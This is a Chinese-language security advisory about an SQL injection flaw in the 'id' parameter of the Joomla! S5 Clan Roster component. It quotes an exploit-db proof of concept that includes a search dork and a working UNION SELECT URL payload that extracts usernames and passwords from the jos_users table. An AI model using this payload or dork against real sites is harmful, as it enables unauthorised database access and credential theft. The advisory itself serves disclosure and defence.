Joomla! S5 Clan Roster组件'id'参数SQL注入漏洞

Joomla! S5 Clan Roster组件'id'参数SQL注入漏洞

发布日期：2013-05-13
更新日期：2013-05-22

受影响系统：
Joomla! S5 Clan Roster
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59993
 
Joomla! S5 Clan Roster组件可以将游戏家族成员组织分类。
 
Joomla! S5 Clan Roster组件在com_s5clanroster（index.php, id param）中存在SQL注入漏洞，成功利用此漏洞可导致未授权数据库操作。
 
<*来源：AtT4CKxT3rR0r1ST
 
  链接：http://www.exploit-db.com/exploits/25410/
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Joomla Component com_s5clanroster Sql Injection Vulnerability
 ==============================================================
 
 ####################################################################
 .:. Author        : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
 .:. Dork          : inurl:"com_s5clanroster"
 .:. Script        : http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
 ####################################################################
 ===[ Exploit ]===

 Sql Injection:
 ==============

 server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]

 server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -
 ####################################################################

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Joomla!
 -------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html